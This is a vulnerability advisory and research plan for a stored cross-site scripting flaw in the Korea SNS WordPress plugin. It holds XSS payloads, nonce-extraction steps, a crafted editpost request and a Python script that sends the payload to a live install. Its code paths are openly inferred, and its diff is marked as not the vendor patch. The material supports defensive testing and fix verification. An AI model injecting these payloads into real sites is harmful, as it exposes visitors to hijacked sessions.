CVE-2026-39667

Korea SNS <= 1.7.0 - Authenticated (Author+) Stored Cross-Site Scripting

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Score: 6.4
Severity: medium
Patched in: Unpatched
Time to patch: N/A

Description

The Korea SNS plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.7.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <=1.7.0
Published: February 18, 2026
Last updated: April 15, 2026
Affected plugin: korea-sns
Research Plan
Unverified

Research Plan: CVE-2026-39667 - Korea SNS <= 1.7.0 Stored XSS

1. Vulnerability Summary

The Korea SNS plugin for WordPress (versions up to 1.7.0) is vulnerable to Stored Cross-Site Scripting (XSS). The vulnerability exists because the plugin fails to adequately sanitize user-supplied input when saving post-specific social sharing settings and subsequently fails to escape this data when rendering it on the frontend. Authenticated users with Author-level permissions or higher can inject malicious JavaScript into fields (likely within a metabox on the post editor screen), which then executes in the browser of any user viewing the affected post.

2. Attack Vector Analysis

  • Vulnerable Endpoint: Post update/save endpoint (/wp-admin/post.php).
  • Vulnerable Parameters: Likely parameters prefixed with ksns_ or korea_sns_ (e.g., ksns_title, ksns_description, or ksns_url_custom) provided via the post editor metabox.
  • Required Authentication: Author-level (PR:L). This role has the edit_posts capability required to save post metadata.
  • Preconditions: The plugin must be active, and the "Korea SNS" sharing buttons must be enabled for the post type being edited.

3. Code Flow (Inferred)

  1. Registration: The plugin registers a metabox on the post editing screen using add_meta_boxes.
  2. Input Collection: During a post save or update, WordPress triggers the save_post hook.
  3. Data Sink (Database): The plugin's handler for save_post retrieves $_POST values (e.g., $_POST['ksns_title']) and saves them to the database using update_post_meta($post_id, 'ksns_title', $value) without using sanitize_text_field.
  4. Data Retrieval: When the post is viewed on the frontend, the plugin hooks into the_content or wp_footer.
  5. Data Sink (Output): The plugin calls get_post_meta($post->ID, 'ksns_title', true) and echoes the value directly into the HTML without using esc_html, esc_attr, or wp_kses.

4. Nonce Acquisition Strategy

To exploit this via a direct HTTP request to post.php, a valid _wpnonce for the post edit action is required.

  1. Create/Identify Post: Ensure a post exists that the Author user can edit.
  2. Navigate to Editor: Open the post edit page: /wp-admin/post-new.php or /wp-admin/post.php?post=ID&action=edit.
  3. Extract Nonces:
    • The primary WordPress nonce for saving posts is located in the #_wpnonce hidden input field.
    • Extract it from the loaded page, for example in the browser console:
      document.querySelector('#_wpnonce').value
      
    • If the plugin uses a specific nonce for its metabox (e.g., ksns_nonce), extract that as well and send it with the save request, since a plugin-side nonce check would otherwise reject the update.

5. Exploitation Strategy

Step 1: Authenticate as Author
Log in to the WordPress instance with a user assigned the "Author" role.

Step 2: Identify Meta Parameters
Visit the post editor for an existing post. Look for a metabox titled "Korea SNS" or similar. Inspect the source code of the inputs to find the name attributes.
Assumption for Payload (inferred): The parameter is ksns_title.

Step 3: Perform Post Update with Payload
Send a POST request to /wp-admin/post.php to update the post metadata.

  • URL: http://localhost:8080/wp-admin/post.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body Parameters:
    • action: editpost
    • post_ID: [POST_ID]
    • _wpnonce: [EXTRACTED_NONCE]
    • ksns_title: "><script>alert(document.domain)</script> (Payload designed to break out of an attribute or tag)
    • post_title: XSS Test Post

Step 4: Trigger XSS
Navigate to the public URL of the post created/edited in Step 3.

6. Test Data Setup

  1. Plugin Installation: Ensure korea-sns version 1.7.0 is installed and active.
  2. User Creation: Create an Author user:
    wp user create attacker attacker@example.com --role=author --user_pass=password123
    
  3. Post Creation: Create a post as the author:
    wp post create --post_type=post --post_status=publish --post_title="Vulnerable Post" --post_author=$(wp user get attacker --field=ID)
    

7. Expected Results

  • Storage: The update_post_meta call should succeed, storing the raw <script> tag in the wp_postmeta table.
  • Rendering: When viewing the post on the frontend, the response HTML should contain the unescaped script:
    <div class="korea-sns-container" data-title=""><script>alert(document.domain)</script>">
    
  • Execution: The browser should trigger an alert box showing the document domain.

8. Verification Steps

  1. Check Database via WP-CLI: Verify the metadata is stored without sanitization.
    wp post meta list [POST_ID] --keys=ksns_title
    
  2. Inspect Frontend HTML: Fetch the public post and grep the response for the payload. A hit on the raw "<script>alert" string confirms unescaped output; seeing only "&lt;script&gt;alert" means the value was escaped on output and the instance is not exploitable this way.
    # (pseudo-command)
    GET /?p=[POST_ID] -> Look for "<script>alert"
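The nonce extraction (section 4), the editpost request (section 5) and the rendering check (section 8) above, combined into one script. This is an added example, not part of the advisory and not the Korea SNS plugin's own code. It assumes the research plan's unconfirmed names (the ksns_title field, a ksns_nonce metabox nonce, and a korea-sns-container element with a data-title attribute) and a lab WordPress install you control; the editor and frontend HTML inside it are constructed samples.

```python
"""Offline-testable model of the nonce -> editpost -> render-check flow.
Added example; the ksns_* names and the data-title output are assumptions
taken from the research plan, not verified plugin code."""
import html
import urllib.request
from html.parser import HTMLParser
from urllib.parse import urlencode

# Payload from step 3 of the exploitation strategy: closes the attribute, then
# injects a script element.
PAYLOAD = '"><script>alert(document.domain)</script>'

# Constructed sample of the relevant inputs on /wp-admin/post.php?post=42&action=edit.
EDITOR_HTML = """
<form name="post" action="post.php" method="post" id="post">
<input type="hidden" id="_wpnonce" name="_wpnonce" value="a1b2c3d4e5">
<input type="hidden" name="post_ID" value="42">
<input type="hidden" name="ksns_nonce" value="f6e5d4c3b2">
<div id="korea-sns-box"><input type="text" name="ksns_title" value=""></div>
</form>
"""


class InputCollector(HTMLParser):
    """Collect name -> value for every <input> element in a page."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            a = dict(attrs)
            if a.get("name"):
                self.fields[a["name"]] = a.get("value") or ""


def extract_fields(editor_html):
    """Section 4: pull _wpnonce, post_ID and any plugin nonce from the editor page."""
    parser = InputCollector()
    parser.feed(editor_html)
    return parser.fields


def build_editpost_body(fields, field_name, payload, post_title="XSS Test Post"):
    """Section 5, step 3: form body for POST /wp-admin/post.php (action=editpost)."""
    if "_wpnonce" not in fields or "post_ID" not in fields:
        raise ValueError("editor page lacks _wpnonce/post_ID: not logged in or wrong page")
    body = {
        "action": "editpost",
        "post_ID": fields["post_ID"],
        "_wpnonce": fields["_wpnonce"],
        "post_title": post_title,
        field_name: payload,
    }
    if "ksns_nonce" in fields:  # forward the plugin nonce if the metabox has one
        body["ksns_nonce"] = fields["ksns_nonce"]
    return urlencode(body)


def classify_rendering(frontend_html, payload):
    """Section 8, step 2: decide how the stored value came back out.

    'unescaped': the page echoed the payload verbatim (vulnerable).
    'escaped':   only the esc_attr()/esc_html()-style encoding is present (fixed).
    'absent':    the value was not rendered at all.
    html.escape() matches WordPress's encoding of ", <, > and &; it differs only
    for the single quote, which this payload does not use.
    """
    if payload in frontend_html:
        return "unescaped"
    if html.escape(payload, quote=True) in frontend_html:
        return "escaped"
    return "absent"


# Constructed frontend fragments: the expected vulnerable output from section 7,
# and the same element after esc_attr() has been applied to the value.
VULNERABLE_FRONTEND = f'<div class="korea-sns-container" data-title="{PAYLOAD}">'
FIXED_FRONTEND = f'<div class="korea-sns-container" data-title="{html.escape(PAYLOAD)}">'


def live_check(base_url, cookie_header, post_id, field_name="ksns_title"):
    """Run the same three requests against a lab install you own (not used offline).
    cookie_header is the Cookie value of a logged-in Author session."""
    def fetch(path, data=None):
        req = urllib.request.Request(base_url + path, data=data,
                                     headers={"Cookie": cookie_header})
        with urllib.request.urlopen(req) as resp:
            return resp.read().decode("utf-8", "replace")

    fields = extract_fields(fetch(f"/wp-admin/post.php?post={post_id}&action=edit"))
    fetch("/wp-admin/post.php", build_editpost_body(fields, field_name, PAYLOAD).encode())
    return classify_rendering(fetch(f"/?p={post_id}"), PAYLOAD)


if __name__ == "__main__":
    fields = extract_fields(EDITOR_HTML)
    print(build_editpost_body(fields, "ksns_title", PAYLOAD))
    print("vulnerable sample:", classify_rendering(VULNERABLE_FRONTEND, PAYLOAD))
    print("fixed sample:", classify_rendering(FIXED_FRONTEND, PAYLOAD))
```

Run as-is to exercise the constructed samples; `live_check("http://localhost:8080", "<Author session cookies>", 42)` performs the real sequence against the test instance from section 6. Classifying the response as escaped rather than merely not matching `<script>alert` is what lets the same script confirm a fix as cleanly as it confirms the bug.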
    

9. Alternative Approaches

  • Metabox Bypass: If the plugin doesn't check the nonce during save_post (common in older plugins), the update could potentially be performed via CSRF or a simpler request omitting standard WP parameters.
  • Shortcode Injection: If the plugin provides a shortcode like [korea-sns title="..."], test if injecting the payload into the shortcode attribute triggers XSS when the post is rendered.
    • Payload: [korea-sns title='"><script>alert(1)</script>']
  • Direct Option Update: If the "Author+" description is slightly inaccurate and the vulnerability is in the global settings, try updating options via admin-ajax.php if the current_user_can check is missing or weak.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Korea SNS plugin for WordPress (up to and including version 1.7.0) is vulnerable to Stored Cross-Site Scripting due to insufficient input sanitization and output escaping of post-specific social sharing metadata. Authenticated attackers with Author-level access or higher can inject arbitrary web scripts into metadata fields such as 'ksns_title', which are subsequently executed in the browsers of users viewing the affected posts.

Vulnerable Code

// Inferred from research plan: Post metadata is saved without sanitization
update_post_meta($post_id, 'ksns_title', $value);

---

// Inferred from research plan: Metadata is retrieved and output without escaping
$ksns_title = get_post_meta($post->ID, 'ksns_title', true);
echo $ksns_title;

Security Fix

--- a/korea-sns.php
+++ b/korea-sns.php
@@ -unknown @@
- update_post_meta($post_id, 'ksns_title', $value);
+ update_post_meta($post_id, 'ksns_title', sanitize_text_field($value));
 
- echo get_post_meta($post->ID, 'ksns_title', true);
+ echo esc_attr(get_post_meta($post->ID, 'ksns_title', true));
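Review bot: the save-side line of this hunk still writes the meta without any authorization check; `update_post_meta($post_id, 'ksns_title', sanitize_text_field($value));` runs for whoever reaches the `save_post` handler, so guard it with `wp_verify_nonce()` on the metabox nonce and `current_user_can('edit_post', $post_id)` before the write (section 9 of the plan already notes that a missing nonce check opens a CSRF route). On the output line, `esc_attr()` matches the `data-title` attribute context shown in the expected rendering, but if the same meta is also echoed as element text or into an inline script, those sites need `esc_html()` and `wp_json_encode()` respectively; sanitizing on save is defence in depth, not a substitute for escaping at each output context. The `@@ -unknown @@` header and the page's Unpatched status mean this is an inferred diff, not the vendor patch, and it should not be cited as the upstream fix.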

Exploit Outline

1. Authenticate as a user with Author, Editor, or Administrator permissions.
2. Access the post editor for any existing post or create a new post.
3. Identify the 'Korea SNS' metabox and extract the current '_wpnonce' from the post editor's HTML source.
4. Send a POST request to /wp-admin/post.php with 'action=editpost' and the target 'post_ID'.
5. Include a malicious payload in a metadata parameter (e.g., ksns_title="><script>alert(document.domain)</script>").
6. View the published post on the frontend to trigger the execution of the stored script.
